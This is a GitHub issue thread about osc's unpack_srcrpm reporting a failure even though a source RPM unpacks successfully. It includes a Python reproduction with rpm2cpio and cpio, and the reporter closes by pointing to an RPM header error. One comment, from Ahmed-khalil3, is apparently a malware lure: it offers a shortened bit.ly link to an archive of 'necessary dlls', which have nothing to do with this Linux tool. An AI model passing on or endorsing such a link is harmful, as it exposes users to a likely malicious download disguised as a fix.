### ISSUE TITLE
The unpack_srcrpm function reported a failure, but in fact, it was executed successfully

### ISSUE THREAD

**Issue by sireg** [openSUSE/osc#1630]
**Describe the bug**
When I run the following command:
`osc importsrcpkg  --name=infiinfinispan infiinfinispan-8.2.4-13.oe2203sp2.src.rpm`
I get error:
error '1' - cannot extract '/xxx/xxx/xxx/infiinfinispan-8.2.4-13.oe2203sp2.src.rpm'

The error occurred within the unpack_srcrpm function, But the srpm package has been unpacked nonetheless.

And then I tested the following code in Python:
```
import subprocess
import os
import sys 

ret = -1
srpm='../infinispan-8.2.4-13.oe2203sp2.src.rpm'
with open(srpm, 'r') as fsrpm:
    with open(os.devnull, 'w') as devnull:
        rpm2cpio_proc = subprocess.Popen(['rpm2cpio'], stdin=fsrpm,
                                          stdout=subprocess.PIPE)
        # XXX: shell injection is possible via the files parameter, but the
        #      current osc code does not use the files parameter.
        cpio_proc = subprocess.Popen(['cpio', '-i'],
                                     stdin=rpm2cpio_proc.stdout,
                                     stderr=devnull)
        rpm2cpio_proc.stdout.close()
        cpio_proc.communicate()
        rpm2cpio_proc.wait()
        ret = rpm2cpio_proc.returncode
        print(f'ret = {ret}')
        if not ret:
            print(f'ret ret = {ret}')
            ret = cpio_proc.returncode

    if ret != 0:
        print('error \'%s\' - cannot extract \'%s\'' % (ret, srpm), file=sys.stderr)
        sys.exit(1)
```
I get the same error.

When I execute `rpm2cpio infiinfinispan-8.2.4-13.oe2203sp2.src.rpm | cpio -i` in the bash command line, it returns correctly.

Even when I unpack the srpm package, regenerate the srpm package, it doesn't report an error.  it might still report an error, It's very uncertain, and I suspect the problem might lie within the Python. 

**Versions**
- Operating system: openSUSE Leap 15.3
- Packages: osc-0.172.0-3.26.1.noarch
- python: 3.6.15 / 3.10.4

**Expected behavior**
The unpack_srcrpm function should be executing correctly within its intended process.

**Additional context**
The link to the SRPM package is as follows:
[https://mirrors.163.com/openeuler/openEuler-22.03-LTS-SP2/update/source/Packages/infinispan-8.2.4-13.oe2203sp2.src.rpm](https://mirrors.163.com/openeuler/openEuler-22.03-LTS-SP2/update/source/Packages/infinispan-8.2.4-13.oe2203sp2.src.rpm)
md5sum:
3f187ef2ae3403d042647e3cc88cfdb0  infinispan-8.2.4-13.oe2203sp2.src.rpm

**Comment by Ahmed-khalil3** [comment]
try this

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by sireg** [comment]
rpm package header error.
